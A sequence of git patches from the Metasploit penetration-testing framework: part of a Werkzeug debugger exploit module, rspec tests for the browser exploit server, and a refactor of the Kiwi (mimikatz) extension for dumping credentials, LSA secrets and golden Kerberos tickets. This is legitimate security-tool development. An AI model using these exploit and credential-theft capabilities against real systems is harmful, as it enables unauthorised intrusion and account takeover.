+    if res and res.body =~ /Werkzeug powered traceback interpreter/
       return Exploit::CheckCode::Vulnerable
     end
     return Exploit::CheckCode::Safe
@@ -54,12 +55,12 @@ class Metasploit4 < Msf::Exploit::Remote
 
   def exploit
     #first we need to get the SECRET code
-    secret = send_request_cgi({
+    res = send_request_cgi({
         'method'   => 'GET',
         'uri'      => normalize_uri(datastore['URI'])
     })
-    if (secret and secret.body =~ /SECRET = "([a-zA-Z0-9]{20})";/)
-      secret = secret.body.match(/SECRET = "([a-zA-Z0-9]{20})";/).captures[0]
+    if res and res.body =~ /SECRET = "([a-zA-Z0-9]{20})";/
+      secret = res.body.match(/SECRET = "([a-zA-Z0-9]{20})";/).captures[0]
       vprint_status("Secret Code: #{secret}")
       res = send_request_cgi({
           'method'   => 'GET',

From 5a858d68a54e895113e74a31476b964b966d700a Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Sat, 11 Jul 2015 21:11:31 -0500
Subject: [PATCH 0740/1013] Add rspec for browser_profile_manager

---
 .../remote/browser_profile_manager_spec.rb    | 51 +++++++++++++++++++
 1 file changed, 51 insertions(+)
 create mode 100644 spec/lib/msf/core/exploit/remote/browser_profile_manager_spec.rb

diff --git a/spec/lib/msf/core/exploit/remote/browser_profile_manager_spec.rb b/spec/lib/msf/core/exploit/remote/browser_profile_manager_spec.rb
new file mode 100644
index 0000000000..a771fff517
--- /dev/null
+++ b/spec/lib/msf/core/exploit/remote/browser_profile_manager_spec.rb
@@ -0,0 +1,51 @@
+require 'msf/core'
+
+describe Msf::Exploit::Remote::BrowserProfileManager do
+
+  subject do
+    mod = Msf::Exploit::Remote.allocate
+    mod.extend described_class
+    mod
+  end
+
+  let(:default_profile) do
+    {
+      'PREFIX' => {'KEY'=>'VALUE'}
+    }
+  end
+
+  before(:each) do
+    framework = double('framework')
+    allow(framework).to receive(:browser_profiles).and_return(default_profile)
+    allow_any_instance_of(described_class).to receive(:framework).and_return(framework)
+  end
+
+  describe '#browser_profile_prefix' do
+    it 'raises a NoMethodError' do
+      expect{subject.browser_profile_prefix}.to raise_exception(NoMethodError)
+    end
+  end
+
+  describe '#browser_profile' do
+    before(:each) do
+      allow(subject).to receive(:browser_profile_prefix).and_return('PREFIX')
+    end
+
+    it 'returns a hash for the profile' do
+      expect(subject.browser_profile).to be_kind_of(Hash)
+    end
+  end
+
+  describe '#clear_browser_profiles' do
+    before(:each) do
+      allow(subject).to receive(:browser_profile_prefix).and_return('PREFIX')
+    end
+
+    it 'clears profile cache' do
+      expect(subject.browser_profile.length).to eq(1)
+      subject.clear_browser_profiles
+      expect(subject.browser_profile).to be_empty
+    end
+  end
+
+end
\ No newline at end of file

From eabf561a1f4d1b6f92f4fa860db47472486fdaf8 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Sat, 11 Jul 2015 22:16:10 -0500
Subject: [PATCH 0741/1013] Fix some BES rspec

---
 .../remote/browser_exploit_server_spec.rb     | 170 +++++++++++++++---
 1 file changed, 141 insertions(+), 29 deletions(-)

diff --git a/spec/lib/msf/core/exploit/remote/browser_exploit_server_spec.rb b/spec/lib/msf/core/exploit/remote/browser_exploit_server_spec.rb
index 78efa7e5d8..075294b6e7 100644
--- a/spec/lib/msf/core/exploit/remote/browser_exploit_server_spec.rb
+++ b/spec/lib/msf/core/exploit/remote/browser_exploit_server_spec.rb
@@ -3,40 +3,38 @@ require 'msf/core'
 
 describe Msf::Exploit::Remote::BrowserExploitServer do
 
-  # When unpacked, this gives us:
-  # {
-  #  "BAP.1433806920.Client.blLGFIlwYrxfvcY" =>
-  #    {
-  #      "source"      => "script",
-  #      "os_name"     => "Windows 8.1",
-  #      "os_vendor"   => "undefined",
-  #      "os_device"   => "undefined",
-  #      "ua_name"     => "Firefox",
-  #      "ua_ver"      => "35.0",
-  #      "arch"        => "x86",
-  #      "java"        => "1.7",
-  #      "silverlight" => "false",
-  #      "flash"       => "14.0",
-  #      "vuln_test"   => "true",
-  #      "proxy"       => false,
-  #      "language"    => "en-US,en;q=0.5",
-  #      "tried"       => true,
-  #      "activex"     => [{"clsid"=>"{D27CDB6E-AE6D-11cf-96B8-444553540000}", "method"=>"LoadMovie"}]
-  # }}
-  let(:first_packed_profile) do
-    "\x81\xD9%BAP.1433806920.Client.blLGFIlwYrxfvcY\x8F\xA6source\xA6script\xA7os_name\xABWindows 8.1\xA9os_vendor\xA9undefined\xA9os_device\xA9undefined\xA7ua_name\xA7Firefox\xA6ua_ver\xA435.0\xA4arch\xA3x86\xA4java\xA31.7\xABsilverlight\xA5false\xA5flash\xA414.0\xA9vuln_test\xA4true\xA5proxy\xC2\xA8language\xC4\x0Een-US,en;q=0.5\xA5tried\xC3\xA7activex\x91\x82\xA5clsid\xD9&{D27CDB6E-AE6D-11cf-96B8-444553540000}\xA6method\xA9LoadMovie"
+  let(:in_memory_profile) do
+   {
+    "BAP.1433806920.Client.blLGFIlwYrxfvcY" =>
+      {
+        source: "script",
+        os_name: "Windows 8.1",
+        os_vendor:  "undefined",
+        os_device: "undefined",
+        ua_name: "Firefox",
+        ua_ver: "35.0",
+        arch: "x86",
+        java: "1.7",
+        silverlight: "false",
+        flash: "14.0",
+        vuln_test: "true",
+        proxy: false,
+        language: "en-US,en;q=0.5",
+        tried: true,
+        activex: [{"clsid"=>"{D27CDB6E-AE6D-11cf-96B8-444553540000}", "method"=>"LoadMovie"}]
+   }}
   end
 
   let(:default_note_type_prefix) do
-    MessagePack.unpack(first_packed_profile).keys.first.split('.')[0,3] * "."
+    in_memory_profile.keys.first.split('.')[0,3] * "."
   end
 
   let(:first_profile_tag) do
-    MessagePack.unpack(first_packed_profile).keys.first.split('.')[3]
+    in_memory_profile.keys.first.split('.')[3]
   end
 
   let(:first_profile_info) do
-    MessagePack.unpack(first_packed_profile).values.first
+    in_memory_profile.values.first
   end
 
   let(:cli) do
@@ -46,6 +44,10 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
     sock
   end
 
+  let(:shortname) do
+    'browser_exploit_server'
+  end
+
   def create_fake_note(tag, data)
     note = double('note')
     allow(note).to receive(:ntype).and_return(tag)
@@ -57,7 +59,7 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
 
   before(:each) do
     allow_any_instance_of(described_class).to receive(:vprint_status)
-    @notes = [create_fake_note(first_profile_tag, first_packed_profile)]
+    @notes = [create_fake_note(first_profile_tag, in_memory_profile)]
   end
 
   subject(:server) do
@@ -65,6 +67,7 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
     mod.extend described_class
     mod.send(:initialize)
     mod.send(:datastore=, {'NoteTypePrefix' => default_note_type_prefix})
+    allow(mod).to receive(:shortname).and_return(shortname)
     mod
   end
 
@@ -99,14 +102,14 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
 
   describe '#has_bad_activex?' do
     context 'when there is a bad activex' do
-      let(:js_ax_value) { "#{first_profile_info['activex'][0][:clsid]}=>#{first_profile_info['activex'][0][:method]}=>false" }
+      let(:js_ax_value) { "#{first_profile_info[:activex][0][:clsid]}=>#{first_profile_info[:activex][0][:method]}=>false" }
       it 'returns false' do
         expect(server.has_bad_activex?(js_ax_value)).to be_truthy
       end
     end
 
     context 'when there is no bad activex' do
-      let(:js_ax_value) { "#{first_profile_info['activex'][0][:clsid]}=>#{first_profile_info['activex'][0][:method]}=>true" }
+      let(:js_ax_value) { "#{first_profile_info[:activex][0][:clsid]}=>#{first_profile_info[:activex][0][:method]}=>true" }
       it 'returns true' do
         expect(server.has_bad_activex?(js_ax_value)).to be_falsey
       end
@@ -194,7 +197,7 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
 
   describe '#on_request_uri' do
     before(:each) do
-      allow(server).to receive(:get_profile_info) { MessagePack.unpack(first_packed_profile) }
+      allow(server).to receive(:get_profile_info) { in_memory_profile }
       allow(server).to receive(:init_profile).with(kind_of(String))
       allow(server).to receive(:update_profile)
       allow(server).to receive(:process_browser_info)
@@ -260,4 +263,113 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
       end
     end
   end
+
+  describe '#browser_profile_prefix' do
+    it 'returns a BES prefix' do
+      expect(subject.browser_profile_prefix).to include(shortname)
+    end
+  end
+
+  describe '#get_custom_404_url' do
+    let(:custom_404) do
+      'http://example.com'
+    end
+
+    before(:each) do
+      allow(subject).to receive(:datastore).and_return({'Custom404'=>custom_404})
+    end
+
+    context 'when a custom 404 URL is set' do
+      it 'returns the URL' do
+        expect(subject.get_custom_404_url).to eq(custom_404)
+      end
+    end
+  end
+
+  describe '#get_module_uri' do
+    let(:exploit_receiver_page) do
+      'exploit_receiver_page'
+    end
+
+    before(:each) do
+      subject.instance_variable_set(:@exploit_receiver_page, exploit_receiver_page)
+      allow(subject).to receive(:get_uri).and_return('')
+    end
+
+    it 'returns a module URI' do
+      expect(subject.get_module_uri).to include(exploit_receiver_page)
+    end
+  end
+
+  describe '#try_set_target' do
+    let(:aux_mod) do
+      mod = Msf::Auxiliary.allocate
+      mod.extend described_class
+      mod.send(:initialize)
+      mod
+    end
+
+    let(:target_options) do
+      {ua_name: 'Firefox'}
+    end
+
+    let(:target) do
+      t = double('target')
+      allow(t).to receive(:opts).and_return(target_options)
+      t
+    end
+
+    let(:default_auto_target) do
+      # The default auto target is always the first on the list.
+      # In a module this would be the "Automatic" target.
+      t = double('target')
+      allow(t).to receive(:opts).and_return({})
+      t
+    end
+
+    let(:targets) do
+      [ default_auto_target, target ]
+    end
+
+    context 'when an auxiliary uses BES' do
+      it 'returns nil' do
+        expect(aux_mod.try_set_target(first_profile_info)).to be_nil
+      end
+    end
+
+    context 'when an exploit uses BES' do
+      it 'sets the instance variable @target' do
+        expect(subject.instance_variable_get(:@target)).to be_nil
+        allow(subject).to receive(:targets).and_return(targets)
+        subject.try_set_target(first_profile_info)
+        expect(subject.instance_variable_get(:@target)).to eq(target)
+      end
+    end
+  end
+
+  skip '#get_bad_requirements' do
+  end
+
+  skip '#process_browser_info' do
+  end
+
+  skip '#has_proxy?' do
+  end
+
+  skip '#cookie_name' do
+  end
+
+  skip '#cookie_header' do
+  end
+
+  skip '#send_exploit_html' do
+  end
+
+  skip '#send_not_found' do
+  end
+
+  skip '#js_vuln_test' do
+  end
+
 end
+

From 88357857a0c1825d0c5a6f56e66a47b9c418918d Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Sat, 11 Jul 2015 23:22:05 -0500
Subject: [PATCH 0742/1013] These datastore options don't need to set anymore

---
 lib/msf/core/exploit/browser_autopwnv2.rb | 2 --
 1 file changed, 2 deletions(-)

diff --git a/lib/msf/core/exploit/browser_autopwnv2.rb b/lib/msf/core/exploit/browser_autopwnv2.rb
index 92a5689538..bd18149e7e 100644
--- a/lib/msf/core/exploit/browser_autopwnv2.rb
+++ b/lib/msf/core/exploit/browser_autopwnv2.rb
@@ -464,8 +464,6 @@ module Msf
     # @return [void]
     def setup
       t1 = Time.now
-      self.datastore['MODULEOWNER'] = Msf::Exploit::Remote::BrowserAutopwnv2
-      self.datastore['DisablePayloadHandler'] = true
 
       super
       @bap_exploits    = []

From 8d40d30d47e0c51ad47123d2295d8646f157b4a0 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Sat, 11 Jul 2015 23:24:01 -0500
Subject: [PATCH 0743/1013] Comemnt

---
 lib/msf/core/exploit/browser_autopwnv2.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/msf/core/exploit/browser_autopwnv2.rb b/lib/msf/core/exploit/browser_autopwnv2.rb
index bd18149e7e..f07e990b8c 100644
--- a/lib/msf/core/exploit/browser_autopwnv2.rb
+++ b/lib/msf/core/exploit/browser_autopwnv2.rb
@@ -311,8 +311,8 @@ module Msf
         # We have to special case firefox
         payload_name = wanted[:payload_name].include?('firefox/') ? wanted[:payload_name].gsub('firefox/', 'generic/') : wanted[:payload_name]
 
-        # User configurable options
-        # We could do a massive multi_handler.datastore.merge!(self.datastore), but this seems
+        # User-configurable options
+        # multi_handler.datastore.merge!(self.datastore) could be used, but
         # really expensive. Costs more loading time.
         multi_handler.datastore['LHOST']                = get_payload_lhost
         multi_handler.datastore['PAYLOAD']              = payload_name

From a7424c93a0ff32a4c36b6ca784bdd9a691bfdafb Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Sun, 12 Jul 2015 01:26:43 -0500
Subject: [PATCH 0744/1013] Update BES rspec

---
 .../remote/browser_exploit_server_spec.rb     | 113 +++++++++++++-----
 1 file changed, 85 insertions(+), 28 deletions(-)

diff --git a/spec/lib/msf/core/exploit/remote/browser_exploit_server_spec.rb b/spec/lib/msf/core/exploit/remote/browser_exploit_server_spec.rb
index 075294b6e7..59597e7f04 100644
--- a/spec/lib/msf/core/exploit/remote/browser_exploit_server_spec.rb
+++ b/spec/lib/msf/core/exploit/remote/browser_exploit_server_spec.rb
@@ -44,6 +44,25 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
     sock
   end
 
+  let(:user_agent) do
+    'Mozilla/5.0 (Windows NT 6.3; rv:39.0) Gecko/20100101 Firefox/35.0'
+  end
+
+  let(:cli_request) do
+    req = Rex::Proto::Http::Request.new
+    req.headers['Cookie'] = cookie
+    req.headers['User-Agent'] = user_agent
+    req
+  end
+
+  let(:tag) do
+    'tag'
+  end
+
+  let(:cookie) do
+    "__ua=#{tag};"
+  end
+
   let(:shortname) do
     'browser_exploit_server'
   end
@@ -59,6 +78,7 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
 
   before(:each) do
     allow_any_instance_of(described_class).to receive(:vprint_status)
+    allow_any_instance_of(described_class).to receive(:vprint_line)
     @notes = [create_fake_note(first_profile_tag, in_memory_profile)]
   end
 
@@ -68,9 +88,15 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
     mod.send(:initialize)
     mod.send(:datastore=, {'NoteTypePrefix' => default_note_type_prefix})
     allow(mod).to receive(:shortname).and_return(shortname)
+    allow(mod).to receive(:fullname).and_return(fullname)
+    allow(mod).to receive(:report_client)
     mod
   end
 
+  let(:fullname) do
+    'auxiliary/server/browser_autopwn2'
+  end
+
   let(:service_double) do
     service = double('service')
     allow(service).to receive(:server_name=)
@@ -164,20 +190,6 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
 
   describe '#retrieve_tag' do
     context 'when the browser has a cookie that contains our tag' do
-      let(:tag) do
-        'tag'
-      end
-
-      let(:cookie) do
-        "__ua=#{tag};"
-      end
-
-      let(:cli_request) do
-        req = Rex::Proto::Http::Request.new
-        req.headers['Cookie'] = cookie
-        req
-      end
-
       it 'returns the tag from the cookie' do
         expect(server.retrieve_tag(cli, cli_request)).to eq(tag)
       end
@@ -214,6 +226,7 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
       @on_request_exploit_called = false
       @send_not_found_called     = false
       @on_request_exploit_called = false
+      @report_client             = nil
     end
 
 
@@ -347,28 +360,72 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
     end
   end
 
-  skip '#get_bad_requirements' do
+  describe '#get_bad_requirements' do
+    context 'when there is a bad requirement' do
+      it 'returns a bad requirement' do
+        requirements = { ua_ver: '34' }
+        subject.instance_variable_set(:@requirements, requirements)
+        expect(subject.get_bad_requirements(first_profile_info)).to include(:ua_ver)
+      end
+    end
+
+    context 'when there is no bad requirement' do
+      it 'returns an empty hash' do
+        requirements = { ua_ver: first_profile_info[:ua_ver] }
+        subject.instance_variable_set(:@requirements, requirements)
+        expect(subject.get_bad_requirements(first_profile_info)).to be_empty
+      end
+    end
   end
 
-  skip '#process_browser_info' do
+  describe '#process_browser_info' do
+    before(:each) do
+      allow(subject).to receive(:report_client) { |args| @report_client = args }
+      allow(subject).to receive(:browser_profile).and_return(Hash.new)
+    end
+
+    context 'when source is :script' do
+      context 'when no profile is found' do
+        it 'reports an empty ua_ver' do
+          subject.process_browser_info(:script, cli, cli_request)
+          expect(@report_client[:ua_ver]).to eq('[]')
+        end
+      end
+    end
+
+    context 'when source is :headers' do
+      context 'when user-agent says the browser is FF 35.0' do
+        it 'reports ua_ver as 35.0' do
+          subject.process_browser_info(:headers, cli, cli_request)
+          expect(@report_client[:ua_ver]).to eq('35.0')
+        end
+      end
+    end
   end
 
-  skip '#has_proxy?' do
+  describe '#has_proxy?' do
+    context 'when there is no proxy' do
+      it 'returns false' do
+        expect(subject.has_proxy?(cli_request)).to be_falsey
+      end
+    end
   end
 
-  skip '#cookie_name' do
+  describe '#cookie_name' do
+    before(:each) do
+      subject.datastore.merge!({'CookieName'=>cookie})
+    end
+
+    it 'returns a cookiename' do
+      expect(subject.cookie_name).to eq(cookie)
+    end
   end
 
-  skip '#cookie_header' do
-  end
-
-  skip '#send_exploit_html' do
-  end
-
-  skip '#send_not_found' do
-  end
-
-  skip '#js_vuln_test' do
+  describe '#cookie_header' do
+    it 'returns a cookie' do
+      tag = 'TAG'
+      expect(subject.cookie_header(tag)).to include(tag)
+    end
   end
 
 end

From 88a00b1ed833bb9cca820d32b0294f9d638325b7 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Sun, 12 Jul 2015 14:45:46 -0500
Subject: [PATCH 0745/1013] We don't use MessagePack anymore

---
 .../core/exploit/browser_autopwnv2_spec.rb    | 44 +++++++++----------
 1 file changed, 21 insertions(+), 23 deletions(-)

diff --git a/spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb b/spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb
index b49b151d8e..c2a5317e60 100644
--- a/spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb
+++ b/spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb
@@ -307,34 +307,32 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
     }
   end
 
-  # When unpacked, this gives us:
-  # {
-  #   "BAP.1433806920.Client.blLGFIlwYrxfvcY" => {
-  #     "source"      => "script",
-  #     "os_name"     => "Windows 8.1",
-  #     "os_vendor"   => "undefined",
-  #     "os_device"   => "undefined",
-  #     "ua_name"     => "Firefox",
-  #     "ua_ver"      => "35.0",
-  #     "arch"        => "x86",
-  #     "java"        => "1.7",
-  #     "silverlight" => "false",
-  #     "flash"       => "14.0",
-  #     "vuln_test"   => "true",
-  #     "proxy"       => false,
-  #     "language"    => "en-US,en;q=0.5",
-  #     "tried"       => true
-  # }}
-  let(:profile_packed_data) do
-    "\x81\xD9%BAP.1433806920.Client.blLGFIlwYrxfvcY\x8E\xA6source\xA6script\xA7os_name\xABWindows 8.1\xA9os_vendor\xA9undefined\xA9os_device\xA9undefined\xA7ua_name\xA7Firefox\xA6ua_ver\xA435.0\xA4arch\xA3x86\xA4java\xA31.7\xABsilverlight\xA5false\xA5flash\xA414.0\xA9vuln_test\xA4true\xA5proxy\xC2\xA8language\xC4\x0Een-US,en;q=0.5\xA5tried\xC3"
+  let(:default_profile_data) do
+    {
+      "BAP.1433806920.Client.blLGFIlwYrxfvcY" => {
+        "source"      => "script",
+        "os_name"     => "Windows 8.1",
+        "os_vendor"   => "undefined",
+        "os_device"   => "undefined",
+        "ua_name"     => "Firefox",
+        "ua_ver"      => "35.0",
+        "arch"        => "x86",
+        "java"        => "1.7",
+        "silverlight" => "false",
+        "flash"       => "14.0",
+        "vuln_test"   => "true",
+        "proxy"       => false,
+        "language"    => "en-US,en;q=0.5",
+        "tried"       => true
+    }}
   end
 
   let(:profile_tag) do
-    MessagePack.unpack(profile_packed_data).keys.first.split('.')[3]
+    default_profile_data.keys.first.split('.')[3]
   end
 
   let(:note_type_prefix) do
-    MessagePack.unpack(profile_packed_data).keys.first.split('.')[0,3] * "."
+    default_profile_data.keys.first.split('.')[0,3] * "."
   end
 
   let(:cli) do
@@ -353,7 +351,7 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
     framework = double('Msf::Framework', datastore: {})
 
     # Prepare fake notes
-    notes = [create_fake_note("#{note_type_prefix}.#{profile_tag}", profile_packed_data)]
+    notes = [create_fake_note("#{note_type_prefix}.#{profile_tag}", default_profile_data)]
 
     # Prepare framework.db
     w = double('workspace')

From 4fc258ec0c118793d76aaae90c5c93af21607beb Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Mon, 13 Jul 2015 13:34:36 +1000
Subject: [PATCH 0746/1013] Remove duplicate entries, allow for output to file

This commit does a few tidies of code, as well as adds the ability to
write all the kiwi output to disk as well as to the console. We can't
yet add this stuff to the credential DB because it's tied to machine,
where the creds that come out of kiwi are often tied to domains.

This also removes duplicate creds from the output list, and gets rid of
the auth id stuff from the output too (not sure why it was useful
before).
---
 .../post/meterpreter/extensions/kiwi/kiwi.rb  |  17 +-
 .../ui/console/command_dispatcher/kiwi.rb     | 208 ++++++++++--------
 2 files changed, 131 insertions(+), 94 deletions(-)

diff --git a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb
index 3a7eeb7d86..b0865f52e4 100644
--- a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb
+++ b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb
@@ -2,6 +2,7 @@
 
 require 'rex/post/meterpreter/extensions/kiwi/tlv'
 require 'rexml/document'
+require 'set'
 
 module Rex
 module Post
@@ -283,9 +284,12 @@ class Kiwi < Extension
     request.add_tlv(TLV_TYPE_KIWI_PWD_ID, pwd_id)
     response = client.send_request(request)
 
+    # keep track of unique entries
+    uniques = Set.new
+
     results = []
     response.each(TLV_TYPE_KIWI_PWD_RESULT) do |r|
-      results << {
+      result = {
         :username => r.get_tlv_value(TLV_TYPE_KIWI_PWD_USERNAME),
         :domain   => r.get_tlv_value(TLV_TYPE_KIWI_PWD_DOMAIN),
         :password => r.get_tlv_value(TLV_TYPE_KIWI_PWD_PASSWORD),
@@ -294,6 +298,17 @@ class Kiwi < Extension
         :lm       => r.get_tlv_value(TLV_TYPE_KIWI_PWD_LMHASH),
         :ntlm     => r.get_tlv_value(TLV_TYPE_KIWI_PWD_NTLMHASH)
       }
+
+      # generate a "unique" set identifier based on the domain/user/pass. We
+      # don't use the whole object because the auth hi/low might be different
+      # but everything else might be the same. Join with non-printable, as this
+      # can't appear in passwords anyway.
+      set_id = [result[:domain], result[:username], result[:password]].join("\x01")
+
+      # only add to the result list if we don't already have it
+      if uniques.add?(set_id)
+        results << result
+      end
     end
 
     return results
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb
index 628df53d87..408a895b7c 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb
@@ -26,7 +26,7 @@ class Console::CommandDispatcher::Kiwi
   # Name for this dispatcher
   #
   def name
-    "Kiwi"
+    'Kiwi'
   end
 
   #
@@ -46,10 +46,9 @@ class Console::CommandDispatcher::Kiwi
     print_line("  '#####'    Ported to Metasploit by OJ Reeves `TheColonial` * * */")
     print_line
 
-    if (client.platform =~ /x86/) and (client.sys.config.sysinfo['Architecture'] =~ /x64/)
-
+    if client.platform =~ /x86/ and client.sys.config.sysinfo['Architecture'] =~ /x64/
       print_line
-      print_warning "Loaded x86 Kiwi on an x64 architecture."
+      print_warning('Loaded x86 Kiwi on an x64 architecture.')
     end
   end
 
@@ -58,19 +57,19 @@ class Console::CommandDispatcher::Kiwi
   #
   def commands
     {
-      "creds_wdigest"         => "Retrieve WDigest creds",
-      "creds_msv"             => "Retrieve LM/NTLM creds (hashes)",
-      "creds_livessp"         => "Retrieve LiveSSP creds",
-      "creds_ssp"             => "Retrieve SSP creds",
-      "creds_tspkg"           => "Retrieve TsPkg creds",
-      "creds_kerberos"        => "Retrieve Kerberos creds",
-      "creds_all"             => "Retrieve all credentials",
-      "golden_ticket_create"  => "Create a golden kerberos ticket",
-      "kerberos_ticket_use"   => "Use a kerberos ticket",
-      "kerberos_ticket_purge" => "Purge any in-use kerberos tickets",
-      "kerberos_ticket_list"  => "List all kerberos tickets",
-      "lsa_dump"              => "Dump LSA secrets",
-      "wifi_list"             => "List wifi profiles/creds"
+      'creds_wdigest'         => 'Retrieve WDigest creds',
+      'creds_msv'             => 'Retrieve LM/NTLM creds (hashes)',
+      'creds_livessp'         => 'Retrieve LiveSSP creds',
+      'creds_ssp'             => 'Retrieve SSP creds',
+      'creds_tspkg'           => 'Retrieve TsPkg creds',
+      'creds_kerberos'        => 'Retrieve Kerberos creds',
+      'creds_all'             => 'Retrieve all credentials',
+      'golden_ticket_create'  => 'Create a golden kerberos ticket',
+      'kerberos_ticket_use'   => 'Use a kerberos ticket',
+      'kerberos_ticket_purge' => 'Purge any in-use kerberos tickets',
+      'kerberos_ticket_list'  => 'List all kerberos tickets',
+      'lsa_dump'              => 'Dump LSA secrets',
+      'wifi_list'             => 'List wifi profiles/creds'
     }
   end
 
@@ -80,7 +79,7 @@ class Console::CommandDispatcher::Kiwi
   def cmd_lsa_dump(*args)
     check_privs
 
-    print_status("Dumping LSA secrets")
+    print_status('Dumping LSA secrets')
     lsa = client.kiwi.lsa_dump
 
     # the format of this data doesn't really lend itself nicely to
@@ -142,24 +141,24 @@ class Console::CommandDispatcher::Kiwi
   # Valid options for the golden ticket creation functionality.
   #
   @@golden_ticket_create_opts = Rex::Parser::Arguments.new(
-    "-h" => [ false, "Help banner" ],
-    "-u" => [ true,  "Name of the user to create the ticket for" ],
-    "-i" => [ true,  "ID of the user to associate the ticket with" ],
-    "-g" => [ true,  "Comma-separated list of group identifiers to include (eg: 501,502)" ],
-    "-d" => [ true,  "Name of the target domain (FQDN)" ],
-    "-k" => [ true,  "krbtgt domain user NTLM hash" ],
-    "-t" => [ true,  "Local path of the file to store the ticket in" ],
-    "-s" => [ true,  "SID of the domain" ]
+    '-h' => [ false, 'Help banner' ],
+    '-u' => [ true,  'Name of the user to create the ticket for' ],
+    '-i' => [ true,  'ID of the user to associate the ticket with' ],
+    '-g' => [ true,  'Comma-separated list of group identifiers to include (eg: 501,502)' ],
+    '-d' => [ true,  'Name of the target domain (FQDN)' ],
+    '-k' => [ true,  'krbtgt domain user NTLM hash' ],
+    '-t' => [ true,  'Local path of the file to store the ticket in' ],
+    '-s' => [ true,  'SID of the domain' ]
   )
 
   #
   # Output the usage for the ticket listing functionality.
   #
   def golden_ticket_create_usage
-    print(
-      "\nUsage: golden_ticket_create [-h] -u <user> -d <domain> -k <krbtgt_ntlm> -s <sid> -t <path> [-i <id>] [-g <groups>]\n\n" +
-      "Create a golden kerberos ticket that expires in 10 years time.\n\n" +
-      @@golden_ticket_create_opts.usage)
+    print_line('Usage: golden_ticket_create [options]')
+    print_line
+    print_line('Create a golden kerberos ticket that expires in 10 years time.')
+    print_line(@@golden_ticket_create_opts.usage)
   end
 
   #
@@ -181,19 +180,19 @@ class Console::CommandDispatcher::Kiwi
 
     @@golden_ticket_create_opts.parse(args) { |opt, idx, val|
       case opt
-      when "-u"
+      when '-u'
         user = val
-      when "-d"
+      when '-d'
         domain = val
-      when "-k"
+      when '-k'
         tgt = val
-      when "-t"
+      when '-t'
         target = val
-      when "-i"
+      when '-i'
         id = val.to_i
-      when "-g"
+      when '-g'
         group_ids = val.split(',').map { |g| g.to_i }.to_a
-      when "-s"
+      when '-s'
         sid = val
       end
     }
@@ -207,7 +206,7 @@ class Console::CommandDispatcher::Kiwi
     ticket = client.kiwi.golden_ticket_create(user, domain, sid, tgt, id, group_ids)
 
     ::File.open( target, 'wb' ) do |f|
-      f.write ticket
+      f.write(ticket)
     end
 
     print_good("Golden Kerberos ticket written to #{target}")
@@ -217,26 +216,26 @@ class Console::CommandDispatcher::Kiwi
   # Valid options for the ticket listing functionality.
   #
   @@kerberos_ticket_list_opts = Rex::Parser::Arguments.new(
-    "-h" => [ false, "Help banner" ],
-    "-e" => [ false, "Export Kerberos tickets to disk" ],
-    "-p" => [ true,  "Path to export Kerberos tickets to" ]
+    '-h' => [ false, 'Help banner' ],
+    '-e' => [ false, 'Export Kerberos tickets to disk' ],
+    '-p' => [ true,  'Path to export Kerberos tickets to' ]
   )
 
   #
   # Output the usage for the ticket listing functionality.
   #
   def kerberos_ticket_list_usage
-    print(
-      "\nUsage: kerberos_ticket_list [-h] [-e <true|false>] [-p <path>]\n\n" +
-      "List all the available Kerberos tickets.\n\n" +
-      @@kerberos_ticket_list_opts.usage)
+    print_line('Usage: kerberos_ticket_list [options]')
+    print_line
+    print_line('List all the available Kerberos tickets.')
+    print_line(@@kerberos_ticket_list_opts.usage)
   end
 
   #
   # Invoke the kerberos ticket listing functionality on the target machine.
   #
   def cmd_kerberos_ticket_list(*args)
-    if args.include?("-h")
+    if args.include?('-h')
       kerberos_ticket_list_usage
       return
     end
@@ -244,13 +243,13 @@ class Console::CommandDispatcher::Kiwi
     # default to not exporting
     export = false
     # default to the current folder for dumping tickets
-    export_path = "."
+    export_path = '.'
 
     @@kerberos_ticket_list_opts.parse(args) { |opt, idx, val|
       case opt
-      when "-e"
+      when '-e'
         export = true
-      when "-p"
+      when '-p'
         export_path = val
       end
     }
@@ -261,7 +260,7 @@ class Console::CommandDispatcher::Kiwi
     fields << 'Export Path' if export
 
     table = Rex::Ui::Text::Table.new(
-      'Header'    => "Kerberos Tickets",
+      'Header'    => 'Kerberos Tickets',
       'Indent'    => 0,
       'SortIndex' => 0,
       'Columns'   => fields
@@ -280,7 +279,7 @@ class Console::CommandDispatcher::Kiwi
 
       # write out each ticket to disk if export is enabled.
       if export
-        path = "<no data retrieved>"
+        path = '<no data retrieved>'
         if t[:raw]
